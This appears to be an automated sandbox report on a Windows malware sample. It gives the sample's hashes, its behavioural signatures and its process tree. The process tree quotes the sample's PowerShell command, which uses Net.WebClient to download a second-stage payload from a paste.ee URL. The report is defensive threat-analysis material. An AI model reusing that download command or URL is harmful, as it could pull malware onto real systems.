Analysis
-
max time kernel
333s -
max time network
340s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
31-10-2022 07:41
Static task
static1
Behavioral task
behavioral1
Sample
a622760878fb5e2df039f05a2718acea11142d2aab07b45f90c71652c19ddff6.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
a622760878fb5e2df039f05a2718acea11142d2aab07b45f90c71652c19ddff6.exe
Resource
win10v2004-20220812-en
General
-
Target
a622760878fb5e2df039f05a2718acea11142d2aab07b45f90c71652c19ddff6.exe
-
Size
1.3MB
-
MD5
45ab0352a69644eb2305982585fa53f8
-
SHA1
809e84d4635ba14294564c09f9836c4f6efdc991
-
SHA256
a622760878fb5e2df039f05a2718acea11142d2aab07b45f90c71652c19ddff6
-
SHA512
c16695735faa7ed56f78426e8309e6d8d6986fa9c89150dfb4ffc8ef75b0dc91ebe6ec70c61595daa5b3b8b3c27612a1b6206a0d3e071f7707f1ea7070c248b3
-
SSDEEP
6144:9msopIGaOAsZjrn/D53cOr4eZys040hZlb9hKxEiXsTznyoWfv9LGArxyd:9m9IHOAaLyK4FvhlPSNG
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 15 5020 powershell.exe 28 5020 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 5020 powershell.exe 5020 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 5020 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 3416 wrote to memory of 5036 3416 a622760878fb5e2df039f05a2718acea11142d2aab07b45f90c71652c19ddff6.exe 79 PID 3416 wrote to memory of 5036 3416 a622760878fb5e2df039f05a2718acea11142d2aab07b45f90c71652c19ddff6.exe 79 PID 3416 wrote to memory of 5036 3416 a622760878fb5e2df039f05a2718acea11142d2aab07b45f90c71652c19ddff6.exe 79 PID 5036 wrote to memory of 5020 5036 cmd.exe 81 PID 5036 wrote to memory of 5020 5036 cmd.exe 81 PID 5036 wrote to memory of 5020 5036 cmd.exe 81
Processes
-
C:\Users\Admin\AppData\Local\Temp\a622760878fb5e2df039f05a2718acea11142d2aab07b45f90c71652c19ddff6.exe"C:\Users\Admin\AppData\Local\Temp\a622760878fb5e2df039f05a2718acea11142d2aab07b45f90c71652c19ddff6.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3416 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c Powershell -Command "[System.Text.Encoding]::UTF8.GetString((New-Object Net.WebClient).DownloadData('https://paste.ee/r/8ioDo/0')).Trim() -replace '</xml>','' -replace '<xml>',''"2⤵
- Suspicious use of WriteProcessMemory
PID:5036 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command "[System.Text.Encoding]::UTF8.GetString((New-Object Net.WebClient).DownloadData('https://paste.ee/r/8ioDo/0')).Trim() -replace '</xml>','' -replace '<xml>',''"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5020
-
-